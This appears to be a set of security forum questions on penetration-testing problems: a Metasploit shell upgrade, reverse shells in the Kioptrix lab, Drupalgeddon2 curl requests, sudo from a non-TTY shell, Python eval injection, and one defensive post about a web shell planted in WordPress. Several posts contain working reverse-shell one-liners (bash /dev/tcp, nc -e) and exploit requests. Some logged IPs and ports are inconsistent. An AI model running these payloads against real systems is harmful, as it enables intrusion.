Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like the rest then I can add more in later.

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look at the script I can upload it to github and share the link (though it’s nothing special, I’d prefer to send the link privately to keep the script as little spread as possible).

Exact Steps I took:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 549
LPORT => 443
msf5 exploit(multi/handler) > set LHOST 10.8.210.314
LHOST => 10.9.139.110
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.9.139.110:443
[*] Command shell session 1 opened (10.9.139.110:443 -> 10.9.0.1:50071) at 2020-05-30 22:31:25 -0400
Login: password
You have a shell have fun
#> background
Background session 1? [y/N]  y
msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

The Issue:

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.139.110:4433
[-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
[-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
[-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec'
[-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?'
[-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'

Note: I have taken a look at some of the files, but they seem to be coded in ruby (something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seem to be similar issues posted on github if it helps.

Kioptrix 2: Why doesn’t a netcat reverse shell executed in the web browser via a command injection bug work?

I’ve completed the kioptrix level 2 challenge via a bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is why a netcat reverse shell executed in the web browser via the command injection bug doesn’t work when it was working just fine via the terminal?

My Setup

Kali - 10.10.13.37
Kioptrix 2 - 10.10.13.254

netcat listener

kali@kali:~$ nc -lp 4444

I’ve verified that tcp port 4444 is open.

kali@kali:~$ ss -antp | g 4444
LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))
kali@kali:~$

The netcat reverse shell executed in the web browser via the command injection bug doesn’t work.

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

However, when I repeat the same process with netcat executed on the Kioptrix 2 terminal, I was able to get the reverse shell set up on Kali.

[backdoor@kioptrix ~]$ nc 10.10.13.37 4444 -e /bin/sh

The reverse shell via the terminal is working fine.

kali@kali:~$ nc -lp 4444
id
uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor)

tcpdump traffic; the last 4 packets were for the id command

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0

HTTPS Reverse Shell: why, and which features are essential?

As an exercise I’m trying to write an HTTPS reverse shell on this assumption which I read elsewhere: ”HTTPS egress traffic would be monitored less”. Also HTTPS traffic would be encrypted. Anyway, if a firewall just filters traffic on an IP address basis it would be useless in my opinion, or am I wrong?

Which reasons should I have to use an HTTPS reverse shell instead of a TCP reverse shell? When would it bring some advantages? Which features should the HTTPS reverse shell have?

Executing a sudo command in one line within a non-tty shell

I have access to a server via RCE over http; I can send post requests to the server which result in command execution. I am attempting to escalate privileges via sudo (su is not installed).

The server is heavily firewalled and there are no writeable directories/files within the web application.

My objective is to experiment with the sudo command to escalate privileges, but because the command execution is not in a TTY, I am unable to execute the sudo command.

Is it possible to execute a command like sudo -S in a non-TTY shell?

Maybe using python’s pty module to spawn /bin/bash or /bin/sh, but what about a method to just execute a single binary with some parameters passed to it, like sudo -S <command>, within/as a TTY shell?

To summarize: Is there a way to run sudo in a single line in a non-TTY shell?

For example I am trying to run sudo with these parameters:

echo <password> | sudo -S id

Can a PHP shell uploaded to a WordPress directory have access to an entire Linux machine?

I run a few WordPress instances. I had one new one that I had not configured and left sitting, so the installation was on the 1st step awaiting the database name, username, password, and host. When I went to finish the install after letting it sit like that for a week, I noticed that someone had found the site, inputted their own database information, and “took the site over”. It was a blank slate, so not much to it.

I removed the wp-config.php file and re-ran the installation with my own values. I then looked around for anything suspicious in the WordPress directory. I had found a shell plugin they installed, labeled “UBH console”. I couldn’t get the console to run, I got a 404 error.

I assume this shell couldn’t get them access out into the machine past the www directory the website was installed in?

In the past, I’ve always set the WordPress directory permissions with the following command:

chown -R www-data:www-data directory/

Is this the right way to set these directories? Upon further research, a lot of people run this and stay like this, but I’ve heard you should change your permissions after running the installation. I’m running Debian on my machine.
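The contrast the question is asking about, as an added example (not code from the post): a recursive chown to the web server user lets the PHP process, and any web shell it runs, rewrite every file in the tree, whereas the function below gives the server group read-only access everywhere except uploads. The owner "deploy" and group "www-data" are placeholder assumptions, and find_server_writable is a check for anything the hardening missed.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes GNU find/chmod on Linux, a
# non-web user (placeholder "deploy") that owns the code, and a web server that
# runs in a separate group (placeholder "www-data").

# harden_wp_dir ROOT [OWNER] [GROUP]
harden_wp_dir() {
    root="$1"
    owner="${2:-deploy}"
    group="${3:-www-data}"

    # Code is owned by the deploy user; the server group only needs read access.
    # This replaces "chown -R www-data:www-data", which makes everything server-writable.
    chown -R "$owner:$group" "$root"
    find "$root" -type d -exec chmod 755 {} +   # rwxr-xr-x
    find "$root" -type f -exec chmod 644 {} +   # rw-r--r--

    # The only place the web server must write is the uploads directory.
    if [ -d "$root/wp-content/uploads" ]; then
        find "$root/wp-content/uploads" -type d -exec chmod 775 {} +
        find "$root/wp-content/uploads" -type f -exec chmod 664 {} +
    fi

    # wp-config.php carries database credentials: keep it unreadable to "other".
    if [ -f "$root/wp-config.php" ]; then
        chmod 640 "$root/wp-config.php"
    fi
}

# find_server_writable ROOT: list files and directories outside uploads that the
# server group or anyone else can write. Output is empty on a hardened tree.
find_server_writable() {
    find "$1" -path "$1/wp-content/uploads" -prune -o \
        \( -type f -o -type d \) -perm /022 -print
}
```

Re-run find_server_writable after each plugin or theme install, since installers and updates frequently loosen modes again.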

Sending a reverse shell command through the drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on a drupal 7.57 ubuntu machine.

The requests:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \
  --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id

curl -k -i "http://192.168.204.141/?q=file/ajax/name/%23value/${form_build_id}" \
  --data "form_build_id=${form_build_id}"

These execute, along with any other command (ls, cd, …), and print a result.

But when I send the curl request:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=nc-e/bin/sh 192.168.204.128 5555'--data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id . 

It doesn’t print anything (no form_build_id), not even an error, and the target doesn’t connect to the handler. Where do you think the problem is?

I have tried other payloads, and they result in the same thing.

Why does the reverse shell give an ambiguous redirect? [closed]

I am exploiting the python eval function. In the target system the code is like

eval('%s > 1' % My_Payload)

However, the reverse shell is giving an ambiguous redirect error. I am sending code like

"__import__('os').system('bash -i >& /dev/tcp/192.168.1.10/8081 0>&1')"

nc -lvnp 8081
listening on [any] 8081 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.10] 43478
-bash: 1)#")}: ambiguous redirect

It seems to me that the system does not have /dev/tcp, but I am not sure.

Any help appreciated.